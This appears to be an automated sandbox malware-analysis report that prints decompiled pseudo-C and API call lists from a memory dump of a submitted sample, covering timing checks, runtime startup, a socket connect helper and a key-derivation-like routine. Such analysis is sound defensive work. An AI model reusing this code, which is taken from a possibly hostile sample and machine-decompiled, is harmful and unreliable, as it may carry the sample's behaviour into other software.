    0x003e0b95
    0x003e0b95
    0x003e0b9a
    0x003e0b9d
    0x003e0ba2
    0x00000000
    0x003e0b9a
    0x003e0abe
    0x003e0ac0
    0x003e0ac5
    0x003e0aca
    0x00000000
    0x00000000
    0x003e0ad0
    0x003e0ad8
    0x003e0adc
    0x003e0b94
    0x00000000
    0x003e0b94
    0x003e0ae8
    0x003e0af7
    0x003e0afc
    0x003e0b01
    0x003e0b83
    0x003e0b85
    0x003e0b8a
    0x003e0b8b
    0x003e0b90
    0x003e0b93
    0x00000000
    0x003e0b93
    0x003e0b07
    0x003e0b12
    0x00000000
    0x00000000
    0x003e0b14
    0x003e0b25
    0x003e0b27
    0x003e0b2b
    0x003e0b2f
    0x003e0b34
    0x003e0b35
    0x003e0b3a
    0x003e0b3a
    0x003e0b3d
    0x003e0b3f
    0x003e0b45
    0x003e0b50
    0x003e0b54
    0x003e0b59
    0x003e0b7c
    0x003e0b7c
    0x00000000
    0x003e0b5b
    0x003e0b5b
    0x003e0b61
    0x003e0b63
    0x003e0b67
    0x003e0b6a
    0x003e0b6d
    0x003e0b71
    0x003e0b73
    0x003e0b74
    0x003e0b77
    0x00000000
    0x003e0b61
    0x003e0b59
    0x003e0a87
    0x003e0a9b
    0x003e0aa0
    0x003e0aa5
    0x00000000
    0x00000000
    0x00000000

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003E0AC0
    • ??3@YAXPAX@Z.MSVCRT ref: 003E0B35
    • _time64.MSVCRT ref: 003E0B63
      • Part of subcall function 003CCB70: SysFreeString.OLEAUT32(?), ref: 003CCB81
    • ??3@YAXPAX@Z.MSVCRT ref: 003E0B8B
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C1FE0, Relevance: 6.1, APIs: 4, Instructions: 113
    C-Code - Quality: 78%
    			E003C1FE0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr* _t55;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr* _t70;
				intOrPtr* _t72;
				signed int _t75;
				signed int _t77;
				void* _t78;
				void* _t79;

				_t72 = _a12;
				_t53 =  *_t72;
				_t75 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t34 = E003C5A10(_a8, 0x17,  *((intOrPtr*)(_t53 + 0x10)),  &_v8,  &_v12,  &_v20, __edi, __esi);
				_t79 = _t78 + 0x18;
				if(_t34 == 0) {
					L13:
					_t35 = _v8;
					if(_v8 != 0) {
						E003CBB40(_t35);
					}
					return _v16;
				}
				_push(0x34);
				L003CA47E();
				_t79 = _t79 + 4;
				if(_t34 != 0) {
					_t75 = E003C70B0(_t34);
				}
				if(E003C9020(_t75, _a4, _v8, _v12) == 0) {
					L11:
					__eflags = _t75;
					if(_t75 != 0) {
						E003CCB70(_t53, _t75, _t72);
						_push(_t75);
						L003C1CB0();
						_t79 = _t79 + 4;
					}
				} else {
					_t41 =  *((intOrPtr*)(_t75 + 0x10));
					if(_t41 != _v20) {
						goto L11;
					}
					_t86 = _t41 -  *((intOrPtr*)(_t53 + 0x10));
					if(_t41 <=  *((intOrPtr*)(_t53 + 0x10))) {
						goto L11;
					}
					E003E0900(_t53, _v8, _v12);
					E003C2150(_t86, _t75);
					_t61 =  *0x3e8628; // 0x622508
					_t70 =  *((intOrPtr*)(_t61 + 0xac));
					_v16 = 1;
					 *_t70(0x3e8594);
					E003CCB70(_t53, _t53, _t72);
					L003C1CB0();
					 *_t72 = _t75;
					_t47 =  *0x3e8628; // 0x622508
					_t79 = _t79 + 0x10;
					 *((intOrPtr*)( *((intOrPtr*)(_t47 + 0xc4))))(0x3e8594, _t53);
					_t49 =  *_t72;
					if(_t49 == 0) {
						goto L13;
					}
					_t77 = 0;
					if( *((intOrPtr*)(_t49 + 0x18)) <= 0) {
						goto L13;
					}
					_t55 = __imp___time64;
					do {
						_t50 =  *_t55(0);
						_t65 =  *((intOrPtr*)( *_t72 + 0x28));
						 *((intOrPtr*)(_t65 + _t77 * 8)) = _t50;
						 *((intOrPtr*)(_t65 + 4 + _t77 * 8)) = _t70;
						_t70 =  *_t72;
						_t77 = _t77 + 1;
						_t79 = _t79 + 4;
					} while (_t77 <  *((intOrPtr*)(_t70 + 0x18)));
				}
			}






















    0x003c1fe9
    0x003c1fec
    0x003c1ff2
    0x003c1fff
    0x003c2002
    0x003c2005
    0x003c200f
    0x003c2012
    0x003c2017
    0x003c201c
    0x003c2101
    0x003c2101
    0x003c2109
    0x003c210c
    0x003c2111
    0x003c211a
    0x003c211a
    0x003c2022
    0x003c2024
    0x003c2029
    0x003c202e
    0x003c2037
    0x003c2037
    0x003c204e
    0x003c20ed
    0x003c20ed
    0x003c20ef
    0x003c20f3
    0x003c20f8
    0x003c20f9
    0x003c20fe
    0x003c20fe
    0x003c2054
    0x003c2054
    0x003c205a
    0x00000000
    0x00000000
    0x003c2060
    0x003c2063
    0x00000000
    0x00000000
    0x003c2071
    0x003c2077
    0x003c207c
    0x003c2082
    0x003c2090
    0x003c2097
    0x003c209b
    0x003c20a1
    0x003c20a6
    0x003c20a8
    0x003c20b3
    0x003c20bb
    0x003c20bd
    0x003c20c1
    0x00000000
    0x00000000
    0x003c20c3
    0x003c20c8
    0x00000000
    0x00000000
    0x003c20ca
    0x003c20d0
    0x003c20d2
    0x003c20d6
    0x003c20d9
    0x003c20dc
    0x003c20e0
    0x003c20e2
    0x003c20e3
    0x003c20e6
    0x003c20eb

    APIs
      • Part of subcall function 003C5A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,003CFE81), ref: 003C5ABF
    • ??2@YAPAXI@Z.MSVCRT ref: 003C2024
    • ??3@YAXPAX@Z.MSVCRT ref: 003C20A1
    • _time64.MSVCRT ref: 003C20D2
      • Part of subcall function 003CCB70: SysFreeString.OLEAUT32(?), ref: 003CCB81
    • ??3@YAXPAX@Z.MSVCRT ref: 003C20F9
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CD890, Relevance: 6.1, APIs: 4, Instructions: 98
    C-Code - Quality: 20%
    			E003CD890(void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v8;
				char _v12;
				char _v212;
				void* _t21;
				void* _t26;
				intOrPtr* _t31;
				intOrPtr _t41;
				void* _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;

				_v8 = 0;
				_v12 = 0;
				_t42 = 1;
				E003C9090(__eflags,  &_v212, 0xd);
				_push( &_v12);
				_push( &_v8);
				_push( &_v212);
				_push(5);
				_push(_a8);
				_t21 = E003C5A10();
				_t49 = _t48 + 0x1c;
				if(_t21 == 0) {
					L11:
					_t22 = _v8;
					if(_v8 != 0) {
						E003CBB40(_t22);
					}
					return _t42;
				}
				if(_v8 == 0 || _v12 == 0) {
					_t42 = 2;
					goto L11;
				} else {
					_push(0x14);
					L003CA47E();
					_t49 = _t49 + 4;
					if(_t21 == 0) {
						_t46 = 0;
						__eflags = 0;
					} else {
						_t46 = E003CB1C0(_t21);
					}
					_t41 = _v12;
					_t26 = E003C9020(_t46, _a4, _v8, _t41);
					if(_t26 != 0) {
						__imp___time64(0);
						_t43 =  *((intOrPtr*)(_t46 + 0x10));
						_t49 = _t49 + 4;
						__eflags = 0 - _t41;
						if(__eflags > 0) {
							L18:
							_t31 = _a12;
							_t44 =  *_t31;
							__eflags = _t44;
							if(_t44 != 0) {
								E003C2DE0(_t44);
								_push(_t44);
								L003C1CB0();
								_t49 = _t49 + 4;
							}
							 *_t31 = _t46;
							_t42 = 0;
							goto L10;
						}
						if(__eflags < 0) {
							L17:
							_t42 = 4;
							goto L8;
						}
						__eflags = _t43 - _t26;
						if(_t43 >= _t26) {
							goto L18;
						}
						goto L17;
					} else {
						_t14 = _t26 + 3; // 0x3
						_t42 = _t14;
						L8:
						if(_t46 != 0) {
							E003C2DE0(_t46);
							_push(_t46);
							L003C1CB0();
							_t49 = _t49 + 4;
						}
						L10:
						goto L11;
					}
				}
			}
















    0x003cd8a6
    0x003cd8a9
    0x003cd8ac
    0x003cd8af
    0x003cd8b7
    0x003cd8be
    0x003cd8c5
    0x003cd8c6
    0x003cd8c8
    0x003cd8c9
    0x003cd8ce
    0x003cd8d3
    0x003cd932
    0x003cd932
    0x003cd937
    0x003cd93a
    0x003cd93f
    0x003cd949
    0x003cd949
    0x003cd8d8
    0x003cd989
    0x00000000
    0x003cd8e7
    0x003cd8e8
    0x003cd8ea
    0x003cd8ef
    0x003cd8f4
    0x003cd901
    0x003cd901
    0x003cd8f6
    0x003cd8fd
    0x003cd8fd
    0x003cd903
    0x003cd911
    0x003cd918
    0x003cd94b
    0x003cd951
    0x003cd956
    0x003cd959
    0x003cd95b
    0x003cd96a
    0x003cd96a
    0x003cd96d
    0x003cd96f
    0x003cd971
    0x003cd975
    0x003cd97a
    0x003cd97b
    0x003cd980
    0x003cd980
    0x003cd983
    0x003cd985
    0x00000000
    0x003cd985
    0x003cd95d
    0x003cd963
    0x003cd963
    0x00000000
    0x003cd963
    0x003cd95f
    0x003cd961
    0x00000000
    0x00000000
    0x00000000
    0x003cd91a
    0x003cd91a
    0x003cd91a
    0x003cd91d
    0x003cd91f
    0x003cd923
    0x003cd928
    0x003cd929
    0x003cd92e
    0x003cd92e
    0x003cd931
    0x00000000
    0x003cd931
    0x003cd918

    APIs
      • Part of subcall function 003C5A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,003CFE81), ref: 003C5ABF
    • ??2@YAPAXI@Z.MSVCRT ref: 003CD8EA
    • ??3@YAXPAX@Z.MSVCRT ref: 003CD929
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • _time64.MSVCRT ref: 003CD94B
    • ??3@YAXPAX@Z.MSVCRT ref: 003CD97B
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D0B00, Relevance: 6.1, APIs: 4, Instructions: 85
    C-Code - Quality: 69%
    			E003D0B00(void* __ecx, char __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t21;
				char _t34;
				char* _t36;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t44;
				void* _t48;

				_t34 = __edx;
				_t26 = _a4;
				_t37 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_t14 = E003CC7B0(0, __eflags, _a4);
				_a4 = _t14;
				if(_t14 == 0) {
					L10:
					return 0;
				}
				_t16 = E003CED90(_t14, 0, 0,  &_v20);
				_t42 = _t41 + 0x10;
				if(_t16 == 0) {
					L9:
					E003CBB40(_a4);
					goto L10;
				}
				__imp___time64(0);
				_t42 = _t42 + 4;
				_t18 = _t16 - _v20;
				_t48 = _t18;
				asm("sbb edx, [ebp-0xc]");
				_v8 = _t34;
				if(_t48 < 0) {
					goto L9;
				}
				if(_t48 > 0) {
					L5:
					_t39 = E003C1BE0(_t37, _t49, _t26);
					_t50 = _t39;
					if(_t39 != 0) {
						E003C7A20(_t26, _t39, _t37);
						_push(_t39);
						L003C1CB0();
						_t44 = _t42 + 4;
						_t36 =  &_v8;
						_t21 = E003CEE40(_t37, _t36, _t50, _t26, _t36);
						_t40 = _t21;
						if(_t40 != 0) {
							E003C7A20(_t26, _t40, _t37);
							_push(_t40);
							L003C1CB0();
							_t42 = _t44 + 4;
						} else {
							__imp___time64(_t21);
							_v20 = _t21 - 0x3ed78;
							asm("sbb edx, esi");
							_v16 = _t36;
							E003CCAA0(_a4, _t40, _t40,  &_v20);
							_t42 = _t44 + 0x14;
						}
					}
					goto L9;
				}
				_t49 = _t18 - 0x3f480;
				if(_t18 <= 0x3f480) {
					goto L9;
				}
				goto L5;
			}






















    0x003d0b00
    0x003d0b07
    0x003d0b0f
    0x003d0b11
    0x003d0b14
    0x003d0b17
    0x003d0b1c
    0x003d0b21
    0x003d0bd2
    0x003d0bd8
    0x003d0bd8
    0x003d0b2e
    0x003d0b33
    0x003d0b38
    0x003d0bc4
    0x003d0bc8
    0x00000000
    0x003d0bcd
    0x003d0b3f
    0x003d0b45
    0x003d0b48
    0x003d0b48
    0x003d0b4b
    0x003d0b4e
    0x003d0b51
    0x00000000
    0x00000000
    0x003d0b53
    0x003d0b5c
    0x003d0b64
    0x003d0b66
    0x003d0b68
    0x003d0b6c
    0x003d0b71
    0x003d0b72
    0x003d0b77
    0x003d0b7a
    0x003d0b81
    0x003d0b86
    0x003d0b8a
    0x003d0bb6
    0x003d0bbb
    0x003d0bbc
    0x003d0bc1
    0x003d0b8c
    0x003d0b8d
    0x003d0b9b
    0x003d0ba3
    0x003d0ba7
    0x003d0baa
    0x003d0baf
    0x003d0baf
    0x003d0b8a
    0x00000000
    0x003d0b68
    0x003d0b55
    0x003d0b5a
    0x00000000
    0x00000000
    0x00000000

    APIs
      • Part of subcall function 003CC7B0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000), ref: 003CC828
    • _time64.MSVCRT ref: 003D0B3F
      • Part of subcall function 003C1BE0: ??2@YAPAXI@Z.MSVCRT ref: 003C1C02
      • Part of subcall function 003C1BE0: ??3@YAXPAX@Z.MSVCRT ref: 003C1C4A
      • Part of subcall function 003C7A20: SysFreeString.OLEAUT32(?), ref: 003C7A3C
    • ??3@YAXPAX@Z.MSVCRT ref: 003D0B72
      • Part of subcall function 003CEE40: ??2@YAPAXI@Z.MSVCRT ref: 003CEF57
      • Part of subcall function 003CEE40: ??3@YAXPAX@Z.MSVCRT ref: 003CEF96
      • Part of subcall function 003CEE40: ??3@YAXPAX@Z.MSVCRT ref: 003CF02B
    • _time64.MSVCRT ref: 003D0B8D
    • ??3@YAXPAX@Z.MSVCRT ref: 003D0BBC
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D1B80, Relevance: 6.1, APIs: 4, Instructions: 84
    APIs
      • Part of subcall function 003C5A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,003CFE81), ref: 003C5ABF
    • ??2@YAPAXI@Z.MSVCRT ref: 003D1BAF
    • ??3@YAXPAX@Z.MSVCRT ref: 003D1BEE
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • _time64.MSVCRT ref: 003D1C10
    • ??3@YAXPAX@Z.MSVCRT ref: 003D1C3D
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E2614, Relevance: 6.0, APIs: 4, Instructions: 49
    C-Code - Quality: 100%
    			E003E2614() {
				intOrPtr _t10;
				intOrPtr* _t11;
				signed int _t12;
				intOrPtr* _t15;
				intOrPtr* _t16;
				void* _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t25;
				signed int _t26;
				void* _t28;

				_t28 =  *0x3c0000 - 0x5a4d; // 0x5a4d
				if(_t28 == 0) {
					_t10 =  *0x3c003c; // 0x108
					_t1 = _t10 + 0x3c0000; // 0x4550
					_t11 = _t1;
					__eflags =  *_t11 - 0x4550;
					if( *_t11 != 0x4550) {
						goto L1;
					} else {
						_t25 =  *(_t11 + 0x18) & 0x0000ffff;
						__eflags = _t25 - 0x10b;
						if(_t25 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t11 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t11 + 0x74)) <= 0xe) {
								goto L1;
							} else {
								_t26 = 0;
								__eflags =  *(_t11 + 0xe8);
								goto L9;
							}
						} else {
							__eflags = _t25 - 0x20b;
							if(_t25 != 0x20b) {
								goto L1;
							} else {
								__eflags =  *((intOrPtr*)(_t11 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t11 + 0x84)) <= 0xe) {
									goto L1;
								} else {
									_t26 = 0;
									__eflags =  *(_t11 + 0xf8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t12 = _t26 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t12 = 0;
				}
				 *0x3e864c = _t12;
				__set_app_type(E003C984A(2));
				 *0x3e8c30 =  *0x3e8c30 | 0xffffffff;
				 *0x3e8c34 =  *0x3e8c34 | 0xffffffff;
				_t15 = __p__fmode();
				_t22 =  *0x3e8988; // 0x0
				 *_t15 = _t22;
				_t16 = __p__commode();
				_t23 =  *0x3e8984; // 0x0
				 *_t16 = _t23;
				_t17 = E003C7D3B();
				if( *0x3e8128 == 0) {
					__setusermatherr(E003C7D3B);
				}
				E003C1421(_t17);
				return 0;
			}














    0x003e2619
    0x003e2620
    0x003e2626
    0x003e262b
    0x003e262b
    0x003e2631
    0x003e2637
    0x00000000
    0x003e2639
    0x003e2639
    0x003e263d
    0x003e2643
    0x003e2660
    0x003e2664
    0x00000000
    0x003e2666
    0x003e2666
    0x003e2668
    0x00000000
    0x003e2668
    0x003e2645
    0x003e2645
    0x003e264b
    0x00000000
    0x003e264d
    0x003e264d
    0x003e2654
    0x00000000
    0x003e2656
    0x003e2656
    0x003e2658
    0x003e266e
    0x003e266e
    0x003e266e
    0x003e2671
    0x003e2671
    0x003e2654
    0x003e264b
    0x003e2643
    0x003e2622
    0x003e2622
    0x003e2622
    0x003e2622
    0x003e2675
    0x003e2680
    0x003e2686
    0x003e268d
    0x003e2696
    0x003e269c
    0x003e26a2
    0x003e26a4
    0x003e26aa
    0x003e26b0
    0x003e26b2
    0x003e26be
    0x003e26c5
    0x003e26cb
    0x003e26cc
    0x003e26d3

    APIs
      • Part of subcall function 003C984A: GetModuleHandleA.KERNEL32(00000000), ref: 003C9851
    • __set_app_type.MSVCRT ref: 003E2680
    • __p__fmode.MSVCRT ref: 003E2696
    • __p__commode.MSVCRT ref: 003E26A4
    • __setusermatherr.MSVCRT ref: 003E26C5
      • Part of subcall function 003C1421: _controlfp.MSVCRT ref: 003C142B
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DEB1E, Relevance: 6.0, APIs: 4, Instructions: 39network
    APIs
    • socket.WS2_32(00000002,00000001,00000000), ref: 003DEB2B
    • connect.WS2_32(00000000,?,00000010), ref: 003DEB4F
    • closesocket.WS2_32(00000000), ref: 003DEB5A
    • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 003DEB7C
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C7CF0, Relevance: 6.0, APIs: 4, Instructions: 31
    C-Code - Quality: 54%
    			E003C7CF0(intOrPtr* __ecx) {
				void* _t3;
				long _t5;
				intOrPtr _t6;
				intOrPtr* _t8;
				intOrPtr* _t9;
				void* _t10;

				_t8 = __ecx;
				_t9 =  *__ecx;
				if(_t9 != 0) {
					_t5 = InterlockedDecrement(_t9 + 8);
					if(_t5 == 0 && _t9 != 0) {
						_t6 =  *_t9;
						if(_t6 != 0) {
							__imp__#6(_t6);
						}
						_t5 =  *(_t9 + 4);
						if(_t5 != 0) {
							_push(_t5);
							L003CCB64();
							_t10 = _t10 + 4;
						}
						_push(_t9);
						L003C1CB0();
					}
					 *_t8 = 0;
					return _t5;
				}
				return _t3;
			}









    0x003c7cf2
    0x003c7cf4
    0x003c7cf8
    0x003c7cfe
    0x003c7d06
    0x003c7d0c
    0x003c7d10
    0x003c7d13
    0x003c7d13
    0x003c7d19
    0x003c7d1e
    0x003c7d20
    0x003c7d21
    0x003c7d26
    0x003c7d26
    0x003c7d29
    0x003c7d2a
    0x003c7d2f
    0x003c7d32
    0x00000000
    0x003c7d32
    0x003c7d3a

    APIs
    • InterlockedDecrement.KERNEL32(?), ref: 003C7CFE
    • SysFreeString.OLEAUT32(00000000), ref: 003C7D13
    • ??_V@YAXPAX@Z.MSVCRT ref: 003C7D21
    • ??3@YAXPAX@Z.MSVCRT ref: 003C7D2A
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DED7D, Relevance: 5.2, APIs: 4, Instructions: 200
    C-Code - Quality: 33%
    			E003DED7D(void* __eax, int __ecx, signed int __edx, void* _a4, void* _a8, void* _a12, int _a16, intOrPtr _a20, signed int _a24) {
				void* _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				signed int _v28;
				void* _v32;
				void _v52;
				void _v72;
				signed int _t82;
				void* _t85;
				int _t86;
				signed int _t98;
				signed int _t104;
				signed int _t105;
				signed int* _t110;
				void* _t122;
				int _t123;
				int _t124;
				intOrPtr _t128;
				signed int _t135;
				signed int _t136;
				void* _t142;
				signed int _t144;
				signed int _t146;
				signed int _t152;
				signed int _t155;
				void* _t156;
				void* _t157;
				void* _t167;
				int _t169;
				void* _t172;
				void* _t177;
				void* _t181;
				void* _t183;
				void* _t189;

				_t152 = __edx;
				asm("cdq");
				_t82 = __eax - __edx >> 1;
				_v12 = _t82;
				_t123 = __ecx;
				_v16 = _t82 + _a4;
				_t157 =  *0x3e8538(0x200, _t156, _t167, _t122);
				_v32 = _t157;
				_t85 =  *0x3e8538(0x200);
				_v8 = _t85;
				_t86 =  *0x3e8538(0x200);
				_v24 = _t86;
				_v20 =  *0x3e8538(0x200);
				memcpy(_t157, _a8, __ecx);
				_t169 = _a16;
				memcpy(_t157 + _t123, _a12, _t169);
				_t124 = _t123 + _t169;
				E003DEB87(_a4, _v12, _t157, _t124,  &_v52);
				memcpy(_v8 + 0x10, _t157, _t124);
				asm("cdq");
				_t181 = _t177 + 0x38;
				_t98 = _a24 + (_t152 & 0x0000000f) >> 4;
				_t135 = _a24 & 0x8000000f;
				if(_t135 < 0) {
					_t189 = (_t135 - 0x00000001 | 0xfffffff0) + 1;
				}
				if(_t189 != 0) {
					_t98 = _t98 + 1;
				}
				if(_t98 > 0) {
					_a16 = _v24;
					_v28 = _t98;
					do {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E003DEB87(_a4, _v12, _v8, _t124 + 0x10, _a16);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E003DEB87(_a4, _v12,  &_v72, 0x10,  &_v52);
						_a16 = _a16 + 0x10;
						_t181 = _t181 + 0x28;
						_t36 =  &_v28;
						 *_t36 = _v28 - 1;
					} while ( *_t36 != 0);
					_t157 = _v32;
				}
				E003DEC77(_v16, _v12, _t157, _t124,  &_v52);
				memcpy(_v8 + 0x14, _t157, _t124);
				_t104 = _a24;
				_t183 = _t181 + 0x20;
				asm("cdq");
				_t136 = 0x14;
				_t105 = _t104 / _t136;
				if(_t104 % _t136 != 0) {
					_t105 = _t105 + 1;
				}
				if(_t105 > 0) {
					_t128 = _t124 + 0x14;
					_a4 = _v20;
					_a16 = _t105;
					do {
						_t144 = 5;
						memcpy(_v8,  &_v52, _t144 << 2);
						E003DEC77(_v16, _v12, _v8, _t128, _a4);
						_t146 = 5;
						memcpy( &_v72,  &_v52, _t146 << 2);
						E003DEC77(_v16, _v12,  &_v72, 0x14,  &_v52);
						_a4 = _a4 + 0x14;
						_t183 = _t183 + 0x40;
						_t67 =  &_a16;
						 *_t67 = _a16 - 1;
					} while ( *_t67 != 0);
					_t157 = _v32;
				}
				if(_a24 > 0) {
					_t110 = _v24;
					_t155 = _a24;
					_t142 = _v20 - _t110;
					_t172 = _a20 - _t110;
					do {
						 *(_t172 + _t110) =  *(_t142 + _t110) ^  *_t110;
						_t110 =  &(_t110[0]);
						_t155 = _t155 - 1;
					} while (_t155 != 0);
				}
				 *0x3e8540(_v20);
				 *0x3e8540(_v24);
				 *0x3e8540(_v8);
				return  *0x3e8540(_t157);
			}







































    0x003ded7d
    0x003ded83
    0x003ded87
    0x003ded8a
    0x003ded97
    0x003ded99
    0x003deda3
    0x003deda6
    0x003deda9
    0x003dedb1
    0x003dedb4
    0x003dedbc
    0x003dedca
    0x003dedce
    0x003dedd3
    0x003dede1
    0x003deded
    0x003dedf7
    0x003dee08
    0x003dee13
    0x003dee19
    0x003dee1c
    0x003dee1f
    0x003dee25
    0x003dee2b
    0x003dee2b
    0x003dee2c
    0x003dee2e
    0x003dee2e
    0x003dee31
    0x003dee36
    0x003dee39
    0x003dee3c
    0x003dee45
    0x003dee4d
    0x003dee51
    0x003dee55
    0x003dee56
    0x003dee64
    0x003dee69
    0x003dee73
    0x003dee77
    0x003dee78
    0x003dee7d
    0x003dee81
    0x003dee84
    0x003dee84
    0x003dee84
    0x003dee89
    0x003dee89
    0x003dee98
    0x003deea9
    0x003deeae
    0x003deeb1
    0x003deeb6
    0x003deeb7
    0x003deeb8
    0x003deebc
    0x003deebe
    0x003deebe
    0x003deec1
    0x003deec6
    0x003deec9
    0x003deecc
    0x003deecf
    0x003deed4
    0x003deedf
    0x003deee7
    0x003deef1
    0x003def08
    0x003def0a
    0x003def0f
    0x003def13
    0x003def16
    0x003def16
    0x003def16
    0x003def1b
    0x003def1b
    0x003def22
    0x003def24
    0x003def2d
    0x003def30
    0x003def32
    0x003def34
    0x003def39
    0x003def3c
    0x003def3d
    0x003def3d
    0x003def34
    0x003def43
    0x003def4d
    0x003def57
    0x003def6a

    APIs
    • memcpy.MSVCRT ref: 003DEDCE
    • memcpy.MSVCRT ref: 003DEDE1
      • Part of subcall function 003DEB87: memset.MSVCRT ref: 003DEB9D
      • Part of subcall function 003DEB87: memset.MSVCRT ref: 003DEBAD
      • Part of subcall function 003DEB87: memcpy.MSVCRT ref: 003DEBBF
      • Part of subcall function 003DEB87: memcpy.MSVCRT ref: 003DEBD1
    • memcpy.MSVCRT ref: 003DEE08
      • Part of subcall function 003DEC77: memset.MSVCRT ref: 003DEC88
      • Part of subcall function 003DEC77: memset.MSVCRT ref: 003DEC98
